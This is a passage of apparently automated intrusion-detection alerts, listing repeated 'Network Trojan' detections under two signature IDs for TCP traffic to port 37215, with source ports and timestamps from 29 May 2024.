                SID:2829579
                Source Port:60974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722054
                SID:2835222
                Source Port:59634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782478
                SID:2829579
                Source Port:36794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316357
                SID:2829579
                Source Port:52858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666339
                SID:2835222
                Source Port:43254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901923
                SID:2835222
                Source Port:47670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324321
                SID:2829579
                Source Port:44608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512045
                SID:2829579
                Source Port:47818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.363976
                SID:2835222
                Source Port:59500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652012
                SID:2835222
                Source Port:60390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789144
                SID:2829579
                Source Port:56084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555452
                SID:2835222
                Source Port:45582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842192
                SID:2835222
                Source Port:34580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681806
                SID:2835222
                Source Port:60756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076657
                SID:2835222
                Source Port:51844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773478
                SID:2829579
                Source Port:43776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325621
                SID:2835222
                Source Port:56104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561831
                SID:2835222
                Source Port:41550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171807
                SID:2829579
                Source Port:55116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022393
                SID:2829579
                Source Port:51252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.393510
                SID:2829579
                Source Port:60728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565140
                SID:2829579
                Source Port:51510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767537
                SID:2829579
                Source Port:53026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909329
                SID:2835222
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856920
                SID:2829579
                Source Port:36250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785437
                SID:2829579
                Source Port:53684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971693
                SID:2829579
                Source Port:46208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443034
                SID:2835222
                Source Port:46716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854586
                SID:2835222
                Source Port:53348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848245
                SID:2835222
                Source Port:42730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025628
                SID:2835222
                Source Port:57914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272313
                SID:2835222
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986734
                SID:2829579
                Source Port:33330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853875
                SID:2829579
                Source Port:44912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.636247
                SID:2829579
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464046
                SID:2835222
                Source Port:48060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335725
                SID:2835222
                Source Port:58394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517740
                SID:2835222
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.859112
                SID:2829579
                Source Port:44176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983658
                SID:2829579
                Source Port:53488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164990
                SID:2835222
                Source Port:40530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722093
                SID:2835222
                Source Port:36044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656162
                SID:2835222
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896457
                SID:2835222
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287950
                SID:2835222
                Source Port:51944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511418
                SID:2835222
                Source Port:58008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982684
                SID:2835222
                Source Port:37680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013755
                SID:2835222
                Source Port:57486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611474
                SID:2835222
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.440280
                SID:2835222
                Source Port:58402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182644
                SID:2835222
                Source Port:48006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993646
                SID:2829579
                Source Port:44804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559134
                SID:2829579
                Source Port:40666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375269
                SID:2835222
                Source Port:50740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663395
                SID:2829579
                Source Port:50028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617249
                SID:2835222
                Source Port:57810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786132
                SID:2829579
                Source Port:54208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881323
                SID:2829579
                Source Port:35468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437116
                SID:2829579
                Source Port:40334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903790
                SID:2835222
                Source Port:43310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959743
                SID:2829579
                Source Port:33612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.861587
                SID:2835222
                Source Port:56336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574620
                SID:2835222
                Source Port:47968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508601
                SID:2829579
                Source Port:50334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669473
                SID:2835222
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.851304
                SID:2829579
                Source Port:53498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979684
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508706
                SID:2829579
                Source Port:35068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227184
                SID:2835222
                Source Port:59128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361372
                SID:2829579
                Source Port:37144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460373
                SID:2829579
                Source Port:45546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161225
                SID:2829579
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292858
                SID:2835222
                Source Port:47152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462433
                SID:2835222
                Source Port:51608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575195
                SID:2835222
                Source Port:58592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321371
                SID:2835222
                Source Port:40496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784006
                SID:2829579
                Source Port:42740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870052
                SID:2835222
                Source Port:34662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561067
                SID:2835222
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959030
                SID:2835222
                Source Port:36422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024623
                SID:2835222
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014419
                SID:2835222
                Source Port:51474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361829
                SID:2835222
                Source Port:44926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417987
                SID:2829579
                Source Port:59610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.983377
                SID:2829579
                Source Port:37678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628687
                SID:2829579
                Source Port:55396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575589
                SID:2829579
                Source Port:60776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975390
                SID:2835222
                Source Port:35308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.081866
                SID:2829579
                Source Port:41406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025478
                SID:2835222
                Source Port:44626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415608
                SID:2835222
                Source Port:49520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971693
                SID:2835222
                Source Port:46132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180476
                SID:2835222
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929900
                SID:2835222
                Source Port:57852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386149
                SID:2829579
                Source Port:39784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161039
                SID:2835222
                Source Port:59530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975788
                SID:2835222
                Source Port:46788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840123
                SID:2835222
                Source Port:52156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320530
                SID:2829579
                Source Port:35392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.426211
                SID:2835222
                Source Port:40374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958285
                SID:2835222
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237376
                SID:2829579
                Source Port:50958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.981141
                SID:2835222
                Source Port:56802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039829
                SID:2835222
                Source Port:38050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059780
                SID:2835222
                Source Port:59588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836862
                SID:2835222
                Source Port:37914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910708
                SID:2829579
                Source Port:32978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882950
                SID:2835222
                Source Port:41834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169039
                SID:2835222
                Source Port:44096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957984
                SID:2829579
                Source Port:59586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631567
                SID:2829579
                Source Port:34142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398775
                SID:2835222
                Source Port:49376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812970
                SID:2835222
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654991
                SID:2829579
                Source Port:41020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261810
                SID:2829579
                Source Port:43642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816564
                SID:2835222
                Source Port:53368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872826
                SID:2829579
                Source Port:37926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943936
                SID:2829579
                Source Port:40660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963066
                SID:2829579
                Source Port:54380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669310
                SID:2835222
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854462
                SID:2835222
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710949
                SID:2835222
                Source Port:60744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140932
                SID:2835222
                Source Port:46450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841831
                SID:2829579
                Source Port:37856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289003
                SID:2829579
                Source Port:42942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465904
                SID:2829579
                Source Port:43646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881514
                SID:2829579
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037013
                SID:2829579
                Source Port:40380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284181
                SID:2835222
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316402
                SID:2835222
                Source Port:60234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770285
                SID:2835222
                Source Port:34696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896519
                SID:2835222
                Source Port:55412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667813
                SID:2835222
                Source Port:51638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277393
                SID:2835222
                Source Port:55876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983285
                SID:2829579
                Source Port:34614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163568
                SID:2829579
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713665
                SID:2835222
                Source Port:37340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286535
                SID:2835222
                Source Port:36818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895789
                SID:2835222
                Source Port:59648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966877
                SID:2829579
                Source Port:56890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943142
                SID:2829579
                Source Port:60890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321103
                SID:2829579
                Source Port:56672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790662
                SID:2835222
                Source Port:45468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582892
                SID:2835222
                Source Port:44428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931792
                SID:2835222
                Source Port:52048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783944
                SID:2835222
                Source Port:35350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665048
                SID:2829579
                Source Port:43954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336304
                SID:2835222
                Source Port:45730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618018
                SID:2829579
                Source Port:43024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900439
                SID:2829579
                Source Port:59482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721089
                SID:2835222
                Source Port:53310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779410
                SID:2835222
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612212
                SID:2829579
                Source Port:39488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418066
                SID:2835222
                Source Port:47500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184075
                SID:2835222
                Source Port:46676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324969
                SID:2835222
                Source Port:41828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182731
                SID:2829579
                Source Port:33326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.368489
                SID:2835222
                Source Port:32972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466110
                SID:2829579
                Source Port:40834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935636
                SID:2829579
                Source Port:42332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278829
                SID:2829579
                Source Port:43858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985473
                SID:2829579
                Source Port:55124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720060
                SID:2835222
                Source Port:46560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036656
                SID:2835222
                Source Port:52786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329416
                SID:2835222
                Source Port:44666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231485
                SID:2829579
                Source Port:48698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076302
                SID:2829579
                Source Port:35976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460574
                SID:2829579
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135600
                SID:2835222
                Source Port:47676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765182
                SID:2835222
                Source Port:47050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779729
                SID:2835222
                Source Port:52550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168794
                SID:2835222
                Source Port:39226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897726
                SID:2835222
                Source Port:32924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319494
                SID:2835222
                Source Port:47486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558307
                SID:2835222
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169466
                SID:2835222
                Source Port:34484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916906
                SID:2829579
                Source Port:59412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180620
                SID:2829579
                Source Port:47332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162195
                SID:2829579
                Source Port:52300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593638
                SID:2829579
                Source Port:60840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325942
                SID:2829579
                Source Port:41262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165919
                SID:2835222
                Source Port:44644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897287
                SID:2829579
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440401
                SID:2835222
                Source Port:42492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160903
                SID:2835222
                Source Port:55876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386127
                SID:2829579
                Source Port:40372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.570807
                SID:2835222
                Source Port:33190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128926
                SID:2829579
                Source Port:50420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321136
                SID:2829579
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727009
                SID:2829579
                Source Port:33848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785146
                SID:2835222
                Source Port:32966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472223
                SID:2829579
                Source Port:36810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522934
                SID:2829579
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783025
                SID:2829579
                Source Port:48994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510123
                SID:2835222
                Source Port:38282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844775
                SID:2835222
                Source Port:42824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948954
                SID:2829579
                Source Port:52754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336369
                SID:2829579
                Source Port:37982
                Destination Port:37215
